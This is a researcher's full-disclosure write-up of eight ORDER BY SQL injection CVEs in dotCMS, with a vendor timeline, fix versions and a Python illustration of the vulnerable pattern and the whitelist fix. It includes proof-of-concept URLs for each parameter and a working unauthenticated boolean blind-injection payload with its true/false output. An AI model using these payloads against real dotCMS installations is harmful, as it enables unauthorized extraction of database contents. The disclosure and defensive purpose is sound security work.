Background

dotCMS

Background on dotCMS can be found in my older post: CVE-2016-4803 dotCMS - email header injection vulnerability (Full Disclosure). There I mentioned that on 2015-12-14 I sent 8 SQL injection vulnerabilities to dotCMS. Now it's time to disclose them.

Partly Blind SQL injection from sort functionality

Why am I doing this? To point out a really widespread problem and mistake: the "order by" parameter comes from the client and goes directly into the SQL query. All 8 SQL injections in dotCMS are exactly like this.

Based on my experience, it's a widespread problem even in applications which mostly use prepared statements. As you cannot bind ORDER BY and GROUP BY identifiers as parameters, those are still often concatenated dynamically into the SQL query.

List of Vulnerabilities

All listed SQL injection vulnerabilities are from "order by" parameter.

As the attacker controls the SQL query only after the ORDER BY clause, the attacker cannot use UNION. This also means that the attacker cannot get any text from other tables or other databases back into the output (if error messages are displayed, there may be other options). It's a partly blind SQL injection.

The attacker can still manipulate SQL queries and ask the server questions whose answer is just a boolean, yes or no. That is enough to read out all data which is readable by the current database user, which may also include data from other databases (schemas) and tables.

CVE-2016-8902 - categoriesServlet, sort

SQL injection vulnerability in the categoriesServlet in dotCMS before 3.3.1 allows remote unauthenticated attackers to execute arbitrary SQL commands via the sort parameter.

Preconditions: None. No authentication needed.

Proof-of-Concept URL, vulnerable parameter is "sort":

/categoriesServlet?start=0&count=10&sort=SQLi

Payload

sort=keywords LIMIT (SELECT CASE WHEN (/*your-boolean-question-here*/) THEN 1 ELSE -1 END)--

For a non-authenticated user the output is always: {"items":[],"numRows":0}

I use "ELSE -1" to cause an error when the condition is false, just to make some change to the output.

Proof-of-Concept for partly blind SQL injection

sort=keywords LIMIT (SELECT CASE WHEN (1=1) THEN 1 ELSE -1 END)-- true, output: {"items":[],"numRows":0}
sort=keywords LIMIT (SELECT CASE WHEN (1=0) THEN 1 ELSE -1 END)-- false, output: blank page

CVE-2016-8903 - "Templates pages", _EXT_13_orderby

SQL injection vulnerability in the "Site Browser > Templates pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_13_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Templates pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_13&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_13_struts_action=%2Fext%2Ftemplates%2Fview_templates&_EXT_13_pageNumber=1&_EXT_13_orderby=SQLi

CVE-2016-8904 - "Containers pages", _EXT_12_orderby

SQL injection vulnerability in the "Site Browser > Containers pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_12_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Containers pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_12&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_12_struts_action=%2Fext%2Fcontainers%2Fview_containers&_EXT_12_pageNumber=1&_EXT_12_orderby=SQLi

CVE-2016-8905 - JSONTags servlet, sort

SQL injection vulnerability in the JSONTags servlet in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the sort parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept

/JSONTags?start=0&count=10&sort=tagname SQLi

CVE-2016-8906 - "Links pages", _EXT_18_orderby

SQL injection vulnerability in the "Site Browser > Links page" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_18_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > Links pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_18&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_18_struts_action=%2Fext%2Flinks%2Fview_links&_EXT_18_pageNumber=1&_EXT_18_orderby=SQLi

CVE-2016-8907 - "Content Types", _EXT_STRUCTURE_orderBy and _EXT_STRUCTURE_direction

SQL injection vulnerability in the "Content Types > Content Types" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_STRUCTURE_orderBy and _EXT_STRUCTURE_direction parameters.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content Types", click on some column title in the resultset table):

/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=SQLi&_EXT_STRUCTURE_direction=SQLi

CVE-2016-8908 - "HTML pages", _EXT_15_orderby

SQL injection vulnerability in the "Site Browser > HTML pages" screen in dotCMS before 3.3.1 allows remote authenticated attackers to execute arbitrary SQL commands via the _EXT_15_orderby parameter.

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Site Browser > HTML pages", click on some column title in the resultset table):

/c/portal/layout?p_l_id=b7ab5d3c-5ee0-4195-a17e-8f5579d718dd&p_p_id=EXT_15&p_p_action=0&p_p_state=maximized&p_p_mode=view&_EXT_15_struts_action=%2Fext%2Fhtmlpages%2Fview_htmlpages&_EXT_15_orderby=modDate,SQLi&_EXT_15_pageNumber=1

CVE-2016-4040 - "Workflow", _EXT_15_orderby

SQL injection vulnerability in the "Workflow Screen" in dotCMS before 3.3.2 allows remote administrators to execute arbitrary SQL commands via the _EXT_15_orderby parameter.

This security hole was publicly announced on dotCMS's own website ("SI-36") and got its CVE number earlier than the others, but it was fixed one version later (3.3.1 vs 3.3.2).

Preconditions: attacker must be authenticated.

Proof-of-Concept URL (from "Admin Site" UI: "Home > Workflow tasks", click on some column title in the resultset table):

/html/portlet/ext/workflows/view_tasks_list.jsp?schemeId=&assignedTo=&createdBy=&stepId=&open=false&closed=true&keywords=&orderBy=SQLi&count=1&page=1

Vulnerability Disclosure Timeline

Timezone for dates: Tallinn/Europe (GMT+3)

"hey, you have a problem"

  • 2015-12-14 | me > dotCMS | 8 SQL injection vulnerabilities
  • 2015-12-14 | dotCMS > me | they were planning fixes in the upcoming release, estimated for the beginning of 2016. They thanked me and wrote "security is something we take seriously"
  • 2016-03-16 | dotCMS | dotCMS version 3.3.1 release [2] - only CVE-2016-4040 is not fixed yet (CVE numbers hadn't been requested at that time)

"how is it going?"

  • 2016-04-07 | me > dotCMS | 5 months since first report, what is the situation with reported vulnerabilities?
  • 2016-04-07 | dotCMS | commit in GitHub | "fixes #8840 sort by sanitizing and email header injection #8841" [5]
  • 2016-04-07 | dotCMS > me | CVE-2016-4040 will be fixed in 3.5, which is estimated to be out in mid-April

releases

  • 2016-04-19 | dotCMS | dotCMS version 3.5 release [4]
  • 2016-05-09 | me > dotCMS | asked for confirmation and version numbers of the fixes, for the CVE and Full Disclosure
  • 2016-05-10 | dotCMS > me | CVE-2016-4040 is fixed in versions 3.5 and 3.3.2.
  • 2016-05-10 | dotCMS | dotCMS version 3.3.2 release [3]

publishes

  • 2016-10-23 | me > mitre.org | CVEs requested for another 7 SQL injection vulnerabilities
  • 2016-10-24 | mitre.org > me | CVEs assigned (CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905, CVE-2016-8906, CVE-2016-8907, CVE-2016-8908)
  • 2016-10-31 | me | Full Disclosure on security.elarlang.eu
  • 2016-11-01 | me | Full Disclosure on the Full Disclosure mailing list on seclists.org [6]

Statuses for listed problems

  • CVE-2016-8902, CVE-2016-8903, CVE-2016-8904, CVE-2016-8905, CVE-2016-8906, CVE-2016-8907, CVE-2016-8908 - fixed in 3.3.1, 3.5
  • CVE-2016-4040 - fixed in 3.3.2, 3.5

Update: Extra findings by Ben Nott

Ben Nott found one more SQL injection: CVE-2017-5344

Credit goes to Erlar Lang for discovering similar SQL injection vulnerabilities in nearby code and for inspiring this discovery.

Update: Extra findings from fixes

When I checked how they fixed the described issues, I found 2 more SQL injections: CVE-2016-10007 and CVE-2016-10008 - 2 SQL injection vulnerabilities in dotCMS, blacklist defence bypass.

Suggestions

Always stay up to date.

Use mapping and whitelisting for ORDER BY parameters.
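An added example (my own illustration, not dotCMS code) in Python with sqlite3 that shows the three points made on this page: why ORDER BY cannot simply be bound as a prepared-statement parameter, the concatenation pattern behind all of the listed CVEs, and the mapping/whitelist fix for both the column and the direction parameter. The table and column names are assumptions made for the example.

```python
import sqlite3

# Constructed sample table standing in for a dotCMS listing; table and column
# names are assumptions for this example, not dotCMS's real schema.
ROWS = [(1, "zebra", "z"), (2, "apple", "a"), (3, "mango", "m")]

# Whitelist: the client value is a lookup key, never SQL text. This also covers
# a direction parameter (cf. _EXT_STRUCTURE_direction in CVE-2016-8907).
SORT_COLUMNS = {"id": "id", "name": "name", "keywords": "keywords"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE category (id INTEGER, name TEXT, keywords TEXT)")
    db.executemany("INSERT INTO category VALUES (?, ?, ?)", ROWS)
    return db


def names_bound(db, sort):
    # Why the bug is so common: a bound parameter is a value, so "ORDER BY ?"
    # sorts by a constant string and the requested order is silently ignored.
    cur = db.execute("SELECT name FROM category ORDER BY ?", (sort,))
    return [r[0] for r in cur]


def names_concatenated(db, sort):
    # The vulnerable pattern from the advisory: client-controlled sort text is
    # spliced into the statement, so anything valid after ORDER BY gets executed.
    cur = db.execute("SELECT name FROM category ORDER BY " + sort)
    return [r[0] for r in cur]


def resolve_order(sort, direction="asc"):
    # Build the ORDER BY fragment only from whitelisted values;
    # return None when either parameter is unknown.
    column = SORT_COLUMNS.get(sort)
    order = DIRECTIONS.get(direction.lower())
    if column is None or order is None:
        return None
    return f"{column} {order}"


def names_whitelisted(db, sort, direction="asc"):
    # The hardened form: an unknown sort/direction is rejected, not sanitized.
    fragment = resolve_order(sort, direction)
    if fragment is None:
        raise ValueError("unsupported sort or direction parameter")
    cur = db.execute("SELECT name FROM category ORDER BY " + fragment)
    return [r[0] for r in cur]
```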
